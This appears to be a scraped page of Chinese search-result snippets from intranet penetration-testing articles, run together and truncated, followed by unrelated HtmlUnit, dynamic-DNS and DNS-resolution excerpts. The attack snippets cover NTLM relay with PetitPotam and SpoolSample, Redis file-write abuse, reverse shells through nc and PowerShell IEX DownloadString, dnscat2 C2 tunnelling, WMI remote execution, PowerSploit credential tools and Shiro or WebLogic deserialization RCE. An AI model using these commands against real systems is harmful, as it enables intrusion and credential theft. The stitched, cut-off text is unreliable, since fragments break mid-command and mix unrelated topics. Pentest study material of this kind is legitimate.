简而言之,这是通过以下方式完成的; 通过 MS-RPRN 或 MS-EFSRPC 通过 HTTP 触发机器身份验证。这需要一组用于 RPC 调用的凭据。...将该机器身份验证中继到 LDAPS 以配置 RBCD RBCD 接管 需要注意的是,WebClient 服务不会在启动时自动启动。...这可以通过众所周知的 RPC 调用(无疑还有其他各种未发布的调用)来完成 PetitPotam.exe logger@80/a.txt 192.168.38.104 SpoolSample.exe 192.168.38.104...您可以通过 PowerShell 命令远程枚举它,该命令Get-NTFile -Win32Path '\\target-ip\pipe\DAV RPC SERVICE'返回命名管道(如果可访问)。...当域用户浏览该 SMB 共享并查看您植入的“searchConnector-ms”文件时,WebClient 服务将在他们的工作站上启动,您可以继续执行上面的步骤 2。
'redteam.lab/dandy' -dc-ip 192.168.134. # 获取dandyTGT的Session Key python3 describeticket.py dandy.ccache...当对启用 WebDAV 的 UNC 路径触发文件操作时,身份验证主机将执行以下操作: 发出一个 OPTIONS 方法来发现 Web 服务器支持的功能, 如果支持 PROPFIND,则发出 PROPFIND...简而言之,这是通过以下方式完成的: 通过 MS-RPRN 或 MS-EFSRPC 通过 HTTP 触发机器身份验证,这需要一组用于 RPC 调用的凭据。...将该机器身份验证中继到 LDAP/LDAPS 以配置 RBCD/Shadow Credentials 需要注意的是,WebClient 服务不会在启动时自动启动。...如果webclient未开启,低权限可以用StartWebClientSvc.o来打开 2.利用sc服务查询 sc query webclient sc config webclient start=
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 1....这时候会导致未授权访问然后使用redis权限写文件!!...IP - Port 正向连接时设置的端口,前面要写上-Bind参数 - Reverse 反向连接 - Bind 正向连接 反向连接:Invoke-PowerShellTcp -Reverse -IPAddress...dnscat2反弹DNS shell dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。.../ew -s ssocksd -l 反弹 SOCKS v5 服务器 这个操作具体分两步: a) 先在一台具有公网 ip 的主机A上运行以下命令: $ .
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 1....这时候会导致未授权访问然后使用redis权限写文件!!...攻击者监听: Nc –lvnp 9999 目标机反弹CMD: powershell IEX (New-Object System.Net.Webclient).DownloadString('https...IP - Port 正向连接时设置的端口,前面要写上-Bind参数 - Reverse 反向连接 - Bind 正向连接 反向连接:Invoke-PowerShellTcp -Reverse -IPAddress...在被攻击的机器上执行: Invoke-PowerShellIcmp -IPAddress 2.2.4 基于HTTP/HTTPS的Poershell交互式Shell
0x1 前言 NTLM Relay大家已经不再陌生了,很多时候我们通过NTLM Relay进行攻击时,会受到协议签名(ldap/s、smb等协议签名)的影响从而导致攻击失败,并且随着时间的流逝...Windows通过WebClient服务实现WebDav,允许Windows程序通过WebDav来创建、读取以及写入服务器上的文件,并通过HTTP服务进行通信,在客户端访问WebDav时,若开启Windows...发现目标后,为了让Relay顺利进行,我们可以添加一份DNS A记录,从而使得WebDav通过默认凭据来对我们进行身份验证,由于在Windows当中,WebDav由WebClient服务实现,而WebClient...,使用PetitPotam 强制WebDav服务器认证我们的攻击机,此处不可使用ip进行强制认证,使用我们先前添加的DNS解析进行强制认证,此处的@符号前为主机名,后为端口号。...://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient https://www.hackingarticles.in
区域界限是相对的 机器角色判断 文件服务器:配合社工,生成payload捆绑到文件服务器公用文件上,可批量上线主机 DNS服务器:端口53,可通过DNS服务器获取内网web系统信息,或者探测域信息 DHCP...ipconfig /all 可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。...通过反向解析查询命令nslookup来解析域名的IP地址,用解析到的IP地址进行对比,判断域控服务器和DNS服务器是否在同一台机器上 #查看当前权限 whoami #获取域用户SID whoami /...computer #攻击主机CMD扫描同网段存活ip for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1....#调用本地ps脚本 powershell_import /usr/share/windows-resources/powersploit/Recon/xx.ps1 #命令执行 powershell_execute
区域界限是相对的 机器角色判断 文件服务器:配合社工,生成payload捆绑到文件服务器公用文件上,可批量上线主机 DNS服务器:端口53,可通过DNS服务器获取内网web系统信息,或者探测域信息 DHCP...ipconfig /all 可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。...通过反向解析查询命令nslookup来解析域名的IP地址,用解析到的IP地址进行对比,判断域控服务器和DNS服务器是否在同一台机器上 #查看当前权限 whoami #获取域用户SID whoami /...computer #攻击主机CMD扫描同网段存活ip for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1..../PowerSploit 建立会话后的meterpreter: #加载模块 load powershell #调用本地ps脚本 powershell_import /usr/share/windows-resources
包括了下载和执行、键盘记录、dns、延时命令等脚本 2、PowerSploit是又一款Post Exploitation 相关工具,Post Exploitation是老外渗透测试标准里面的东西,就是获取...groups.xml 获取明文密码)、 Invoke- ReverseDnsLookup(扫描DNS PTR记录) 渗透开始 首先边界web服务器上fastcgi配置错误,导致服务器被getshell...使用方法还是先把脚本下载到黑客自己的web目录下,我为了方便,我写了一个调用脚本放在web目录下(1.ps1) IEX(New-ObjectNet.WebClient).DownloadString('...:利用smb进行主机识别: use auxiliary/scanner/smb/smb_version 利用刚才找到的管理员密码在内网里面碰撞一下,看看多少主机用的是同样的密码用的是:use auxiliary...详细的文章可以看redis未授权访问总结而redis的csrf漏洞的产生原因是:就是当向redis发送无效指令时,redis自身协议不会终止tcp链接。
在正常情况下,切换会话时需要提供目标用户的登录密码,但在SYSTEM权限下能够完全绕过验证,不输入密码即可切换到目标用户的会话,从而实现未授权登录。...测试人员可以利用WMI提供的管理功能,通过已获取的用户凭据,与本地或远程主机进行交互,并控制其执行各种行为。...目前有两种常见的利用方法: 一是通过调用WMI的类方法进行远程执行,如Win32 Process类中的Create方法可以在远程主机上创建进程,Win32 Product类中的Install方法可以在远程主机上安装恶意的...,指定远程主机的地址;/user,指定远程主机的用户名;/password,指定用户的密码 #通过调用Win32 Process.Create方法在远程主机上创建进程,启动CMD来执行系统命令,由于WMI...(10.10.10.19),通过UNC路径进行远程加载测试人员服务器的MSI文件并进行安装,可以获取远程主机的权限 常见工具 impacket wmiexec.py **前提:**主机开启135 445
Web 界面用于允许用户获取证书(Web 注册),通过 HTTP 协议,不支持签名并接受 NTLM 身份验证。...它可以通过提供标准用户凭据并使用配置 NTLM 中继的系统 IP 和 CA 的 IP 地址来执行。...使用加密文件系统 (EFS) 模块,并指定域控制器和充当 NTLM 中继的主机将发送远程过程调用。...但是,需要注意的是,该攻击仅在“ WebClient ”服务在域控制器上运行时才有效。默认情况下未安装此服务,因此直接执行该工具不太可能产生预期结果。...“WebClient”服务是在服务器上安装“ WebDav Redirector ”功能时创建的。
例如: linux:ls cmd:dir 如果只获取其中的name、mode值,则使用如下指令。...(1) 下载远程PowerShell脚本绕过权限执行 调用DownloadString函数下载远程的ps1脚本文件。...通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。...查看主机密码 Invoke-NinjaCopy.ps1 通过读取原始卷并解析NTFS结构,从NTFS分区卷复制文件 Invoke-CredentialInjection.ps1 使用明文凭据创建登录,...与其他用户创建进程登录令牌,并模仿当前线程中的登录令牌 Get-MicrophoneAudio.ps1 通过麦克风记录声音 VolumeShadowCopyTools.ps1 Recon(信息侦察):这个文件夹主要是以目标主机为跳板进行内网主机侦察
XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。...这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote...比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口...IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server...服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码.
服务端在接收到一个Cookie时,会按照如下步骤进行解析处理: 检索RememberMe Cookie的值 进行Base64解码 进行AES解码 进行反序列化操作 在第4步中的调用反序列化时未进行任何过滤...本机IP为192.168.112.141 参考:Docker容器进入的4种方式 三、漏洞复现 以复现操作为主,底层原理解析见之后的文章 1、Apache Shiro反序列化漏洞(CVE-2016-4437...是刚刚在Win7上搭建的环境的IP 执行calc,远程打开目标主机上的计算器程序 ?...192.168.112.145Kali Linux192.168.112.149 2、实验模拟过程 1)获取内网服务器并上线CS 重点在于后面内网主机的获取,这里直接假设获取了服务器的权限并上线了CS...也就是说在获取了密钥之后可以通过构建恶意的Cookie获取权限执行攻击命令,得到root权限。解决措施就是升级Shiro版本至shiro1.2.5以上。
webClient.getOptions().setThrowExceptionOnFailingStatusCode(false); //当HTTP的状态非200时是否抛出异常...html文档 } finally { webClient.close(); } } } 模仿特定浏览器 有时你想模仿一个特殊的浏览器,这可以通过...WebClient构造函数的com.gargoylesoftware.htmlunit.BrowserVersion 参数实现,其中已经提供一些常见浏览器的常量,但是,你可以通过BrowserVersion...* 默认解析静态页面,如果需要爬取动态数据,请调用重载方法并设置为 true * @param url * @return * @throws Exception...webClient.getOptions().setThrowExceptionOnFailingStatusCode(false); //当HTTP的状态非200时是否抛出异常
_tcp 域控主机名和IP一块出来了 4、探测域内存活主机 (1).使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html (2).查看arp高速缓存表...((ip,port)) print('{0} port {1} is open'.format(ip, port)) except Exception as err:.../domain 获取域密码信息 nltest /domain_trusts 获取域信任信息 nltest /DCLIST:hacke 查看域控制器机器名 Nslookup -type=SRV_ldap..._tcp 查看域控制器的主机名 7、域用户信息收集 net user /domain 向域控制器查询域内用户列表 wmic useraccount get /all 获取域内用户详细信息 net localgroup...-c 192.168.1.4 -p 9999 -e cmd powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com
但公网IP是动态的,它会经常变化,因此通过IP的方式访问非常不友好。...(和阿里云)通过简短的几行.NET代码,即可轻松完成动态域名解析。...动态域名解析的过程 第一步 知道自己的IP地址 第二步 更新DNS的IP解析值 获取自己的IP地址 现在网上有许多网站、服务或者API可以快速获取自己的IP地址,如随手在百度上可以找到http://www.ip138...string currentIp = new WebClient().DownloadString("https://echo-ip.starworks.cc/"); var client = new...默认是不允许80/443端口开放外网的,因此即使有动态域名绑定,以后发给客户时,网址里面也带一个长长的端口名,如:https://cool.starworks.cc:44300。
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon...\test.txt" # 使用修改组策略的方式限制登录 powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com...具体需要通过机器内的主机名、文件、网络连接等多种情况进行综合判断 主机名是最好判断的,通常Web或App是Web服务器;Dev是开发服务器;NAS是存储服务器;File或者Fileserver是文件服务器...使用arp -a + nbtstat -A ip是否存在主机名为Proxy的主机 IE浏览器的Internet设置(直接连接、PAC文件) 最终用Curl进行确认 12 curl www.baidu.com...绘制内网拓扑图 通过目标主机及所在域的各类信息,就可以绘制内网的拓扑图了。 总结: 本文是通过阅读《内网渗透攻防》来学习内网知识,从0到1。
+端口 1008 Frp https://github.com/fatedier/frp/releases/ 使用条件:目标主机通外网,拥有自己的公网ip 对攻击机外网服务端frps.ini进行配置...只需要更换目标的IP,就可以获取session。...--add-computer 当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上...当域控机器未启用LDAPS,并且已获得域普通用户权限时 使用powermad创建一个机器账户newcom https://github.com/Kevin-Robertson/Powermad >New-MachineAccount...当访问一个不存在的共享时修改配置文件来解析 Xp 修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr
当我们使用浏览器访问www.qq.com时,浏览器和目标网站建立连接的前提,是需要知道目标服务器的ip地址,DNS协议起的作用就在这个地方。 ?...www.qq.com的域名解析过程是一个递归过程,步骤如下: 1、在浏览器中输入www.qq.com 域名,操作系统会先检查自己本地的hosts文件是否有这个网址映射关系,如果有,就先调用这个IP地址映射...3、如果hosts与本地DNS解析器缓存都没有相应的网址映射关系,首先会找TCP/ip参数中设置的首选DNS服务器,在此我们叫它本地DNS服务器,此服务器收到查询时,如果要查询的域名,包含在本地配置区域资源中...4、如果要查询的域名,不由本地DNS服务器区域解析,但该服务器已缓存了此网址映射关系,则调用这个IP地址映射,完成域名解析,此解析不具有权威性。...当需要解析的域名,本地DNS服务器无法给出回答时,本地DNS服务器就会采用迭代查询通过互联网与各级域的权威服务器进行查询,比如从com域的服务器得到qq.com域的权威服务器地址,最后定位到所查询域的权威
领取专属 10元无门槛券
手把手带您无忧上云